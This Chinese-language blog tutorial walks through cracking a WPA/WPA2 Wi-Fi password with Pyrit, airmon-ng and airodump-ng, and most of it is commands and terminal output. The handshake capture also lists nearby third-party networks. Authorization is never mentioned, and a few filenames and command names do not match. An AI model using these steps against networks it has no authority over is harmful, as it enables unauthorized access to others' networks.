技术笔记

Pyrit破解WPA和WPA2 Wi-Fi密码

Pyrit是黑客工具中功能最强大的WPA / WPA2破解工具之一,能够对计算机的CPU速度进行基准测试,分析捕获文件中的可破解握手信号,甚至利用GPU密码破解功能

安装Pyrit

要在Kali系统上安装Pyrit,请在终端窗口中键入apt install pyrit。在完整的Kali安装中,默认情况下会安装Pyrit,但对于lite版本,您可能需要手动安装。

~$ apt install pyrit

Reading package lists... Done
Building dependency tree
Reading state information... Done
pyrit is already the newest version (0.5.1+git20180801-1).
pyrit set to manually installed.
The following package was automatically installed and is no longer required:
  libgit2-27
Use 'apt autoremove' to remove it.
0 upgraded, 0 newly installed, 0 to remove and 1795 not upgraded.
~$ pyrit -h

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Usage: pyrit [options] command

Recognized options:
  -b               : Filters AccessPoint by BSSID
  -e               : Filters AccessPoint by ESSID
  -h               : Print help for a certain command
  -i               : Filename for input ('-' is stdin)
  -o               : Filename for output ('-' is stdout)
  -r               : Packet capture source in pcap-format
  -u               : URL of the storage-system to use
  --all-handshakes : Use all handshakes instead of the best one
  --aes            : Use AES

Recognized commands:
  analyze                 : Analyze a packet-capture file
  attack_batch            : Attack a handshake with PMKs/passwords from the db
  attack_cowpatty         : Attack a handshake with PMKs from a cowpatty-file
  attack_db               : Attack a handshake with PMKs from the db
  attack_passthrough      : Attack a handshake with passwords from a file
  batch                   : Batchprocess the database
  benchmark               : Determine performance of available cores
  benchmark_long          : Longer and more accurate version of benchmark (5 minutes)
  check_db                : Check the database for errors
  create_essid            : Create a new ESSID
  delete_essid            : Delete a ESSID from the database
  eval                    : Count the available passwords and matching results
  export_cowpatty         : Export results to a new cowpatty file
  export_hashdb           : Export results to an airolib database
  export_passwords        : Export passwords to a file
  help                    : Print general help
  import_passwords        : Import passwords from a file-like source
  import_unique_passwords : Import unique passwords from a file-like source
  list_cores              : List available cores
  list_essids             : List all ESSIDs but don't count matching results
  passthrough             : Compute PMKs and write results to a file
  relay                   : Relay a storage-url via RPC
  selftest                : Test hardware to ensure it computes correct results
  serve                   : Serve local hardware to other Pyrit clients
  strip                   : Strip packet-capture files to the relevant packets
  stripLive               : Capture relevant packets from a live capture-source
  verify                  : Verify 10% of the results by recomputation

我们需要包含一个捕获文件,该文件将保存我们的WPA / WPA2握手。我们将通过添加-r标志来添加它,文件的位置紧随其后包含我们的握手。接下来,我们需要向Pyrit添加密码列表,我们可以使用import_unique_passwords命令和-i标志来表示要添加的密码列表。我们将使用SecLists GitHub存储库中的WPA密码列表。最后,我们将使用-o标志将密码保存到文件中。

准备好后,我们的最终命令应如下所示:

~$ pyrit -r capture.pcap -o savedpass attack_batch

下载密码列表和基准系统

对于我们的密码列表,我们将下载SecList GitHub存储库中托管的出色的WPA破解单词列表。要将其下载到我们的桌面,请在终端窗口中键入以下命令。

~$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt

--2019-12-20 13:19:39--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45276 (44K) [text/plain]
Saving to: ‘probable-v2-wpa-top4800.txt’

probable-v2-wpa-top 100%[===================>]  44.21K  --.-KB/s    in 0.07s

2019-12-20 13:19:39 (627 KB/s) - ‘probable-v2-wpa-top4800.txt’ saved [45276/45276]

首先列出4800个最坏的密码,然后下载到我们的桌面上。要知道我们能够很快破解它们,我们需要使用Pyrit对我们的系统进行基准测试。为此,请在终端窗口中键入pyrit基准,并等待其完成。

~$ pyrit benchmark

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Running benchmark (1157.3 PMKs/s)... |

Computed 1157.32 PMKs/s total.
#1: 'CPU-Core (SSE2/AES)': 298.2 PMKs/s (RTT 2.9)
#2: 'CPU-Core (SSE2/AES)': 312.0 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2/AES)': 312.6 PMKs/s (RTT 2.7)
#4: 'CPU-Core (SSE2/AES)': 310.5 PMKs/s (RTT 3.0)

我们使用import_passwords命令将密码添加到数据库中,添加-i和要添加的密码列表的路径。在终端窗口中键入以下命令,修改密码列表以匹配您保存密码的位置。

~$ pyrit -i '/root/Desktop/probable-v2-wpa-top4800.txt' import_passwords

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
4800 lines read. Flushing buffers....
All done.

现在我们已经在Pyrit的数据库中保存了4,800个密码,我们可以使用Attack_batch选项。

捕获WPA / WPA2握手

要捕获握手,我们需要在连接到目标Wi-Fi网络的一台设备上进行监听。首先,让我们将卡置于无线监控模式,以便我们可以侦听握手文件。

ifconfig来找到您的无线网络适配器的名称。如果您使用的是与Kali兼容的外部USB适配器,则其名称可能类似于wlan1

~$ ifconfig

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 50:7b:9d:7a:c8:8a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 856  bytes 71488 (69.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 856  bytes 71488 (69.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.37  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 2606:6000:66d0:a000:8991:f76f:faec:2713  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::903f:322c:1ad9:a365  prefixlen 64  scopeid 0x20<link>
        ether 30:52:cb:6b:76:5f  txqueuelen 1000  (Ethernet)
        RX packets 17933  bytes 22147581 (21.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10045  bytes 1333343 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:c0:ca:95:6e:74  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

接下来,我们将使用airmon-ng start wlan1命令将卡置于无线监控模式。默认情况下,Airmon-ng安装在Kali上。当我们再次运行ifconfig时,我们的卡现在应该称为“ wlan1mon”。现在,让我们握手。

首先,我们将进行扫描以查找目标网络所在的频道。为此,请运行airodump-ng wlan1mon。同样,您应该已经有airodump-ng了

~$ airodump-ng wlan1mon

CH 10 ][ Elapsed: 0 s ][ 2019-04-29 12:32

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 18:FE:34:00:00:02  -40        4        0    0   3  48   WPA2 CCMP   PSK  Chicken_Easy_02

我们可以看到目标网络位于通道3上。现在我们知道了,我们可以使用airodump-ng wlan1mon -c 3 -w capture命令捕获一次握手。

~$ airodump-ng wlan1mon -c 3 -w capture

握手后,可以使用Pyrit进行确认。复制捕获文件的位置后,运行命令pyrit -r pathtocapturefile分析以确认您具有有效的捕获。

~$ pyrit -r '/root/Desktop/capture-01.cap' analyze

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file '/root/Desktop/marko-01.cap' (1/1)...
Parsed 122 packets (122 802.11-packets), got 8 AP(s)

#1: AccessPoint 84:61:a0:61:39:90 ('ATT9X3s2e4'):
#2: AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01'):
  #1: Station 84:0d:8e:8c:b0:1c, 4 handshake(s):
    #1: HMAC_SHA1_AES, good, spread 1
    #2: HMAC_SHA1_AES, good, spread 1
    #3: HMAC_SHA1_AES, good, spread 87
    #4: HMAC_SHA1_AES, good, spread 87
#3: AccessPoint 6e:4d:73:96:78:a7 ('Edgardo'):
  #1: Station cc:29:f5:57:fc:98
#4: AccessPoint c4:01:7c:57:69:a8 ('LILA-Guest'):
#5: AccessPoint c4:01:7c:97:69:a8 ('LILA-STAFF'):
#6: AccessPoint 6c:b0:ce:ad:1e:53 ('MyCharterWiFi53-2G'):
#7: AccessPoint b0:98:2b:4a:b4:d4 ('MySpectrumWiFice-2G'):
#8: AccessPoint c4:01:7c:17:69:a8 ('PS-WL-MO'):

在握手上运行Pyrit

现在,我们已经捕获了握手并将密码添加到数据库中,我们可以运行我们之前创建的Attack_batch命令。运行命令pyrit -r pathtocapturefile -o savedpass Attack_batch尝试破解我们捕获的握手。

~$ pyrit -r '/root/Desktop/capture-01.cap' -o savedpass attack_batch

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+

Parsing file '/root/Desktop/capture-01.cap' (1/1)...
Parsed 122 packets (122 802.11-packets), got 8 AP(s)

Picked AccessPoint ce:50:e3:08:11:d4 ('Chicken_Easy_01') automatically.
Tried 447 PMKs so far; 250 PMKs per second. password

The password is '123456789'.

尽管我们并没有解决Pyrit今天可以做的所有事情,但是我们没有涉及很多内容。当然,尽管Pyrit是目前最有力的暴力攻击之一,但一个非常强大的密码仍然可以击败该攻击。Pyrit能够根据您的系统处理的字典和真正的蛮力攻击,因此,如果您不希望使用Pyrit这样的工具轻松破解,请确保选择强密码。

 

admin
我还没有学会写个人说明!
查看“admin”的所有文章 →

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关推荐